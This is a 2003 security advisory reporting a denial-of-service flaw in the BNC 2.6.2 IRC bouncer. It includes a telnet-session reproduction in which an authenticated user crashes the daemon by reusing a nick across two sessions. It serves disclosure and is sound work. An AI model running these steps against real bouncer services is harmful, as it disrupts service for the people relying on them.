vulnerabilities
------------------------------------------------------------------------
2003-05-26  BNC <= 2.6.2 DoS

Rosiello Security & DTORS Security ADVISORY
http://www.rosiello.org

Denial of Service in bnc 2.6.2
February, 2003

I. BACKGROUND

BNC, an acronym for BouNCe, is a daemon that allows people who do not have direct access to the net, but who do have access to another PC that can reach the net, to bounce through that PC to IRC. BNC also serves as a host that lets users bounce through shells to IRC, which provides features such as an interesting internet address, commonly used for show, or benefits such as mild protection from common attacks such as DoS, by covering the user's real IP with the IP of a machine more capable of handling these attacks.

II. DESCRIPTION

An authenticated user of the program can remotely kill the daemon, but cannot execute arbitrary code.

III. ANALYSIS

Exploitation causes the program to exit(), as follows. Open two telnet sessions.

FIRST SESSION:

[angelo@rosiello.org]$ telnet 127.0.0.1 32986
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
user first first first first
nick boom
~
NOTICE AUTH :You need to say /quote PASS
PASS temp123
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Level two, lets connect to something real now
NOTICE AUTH :type /quote conn [server] to connect
NOTICE AUTH :type /quote help for basic list of commands and usage

SECOND SESSION:

[angelo@rosiello.org]$ telnet 127.0.0.1 32986
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
user second second second second
nick boom
NOTICE AUTH :You need to say /quote PASS
PASS temp123
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Level two, lets connect to something real now
NOTICE AUTH :type /quote conn [server] to connect
NOTICE AUTH :type /quote help for basic list of commands and usage
quit
Connection closed by foreign host.

Now close the first session too:

quit

(gdb) Program exited with code 010.

The password must be the right one (the user must be a real one). The daemon will die.

IV. DETECTION

bnc 2.6.2 is vulnerable; the latest versions are not. The maintainer of the project was advised and confirmed that the bug is fixed in the latest versions.

VIII. CREDIT

Angelo Rosiello
http://www.rosiello.org
http://www.dtors.net

Software: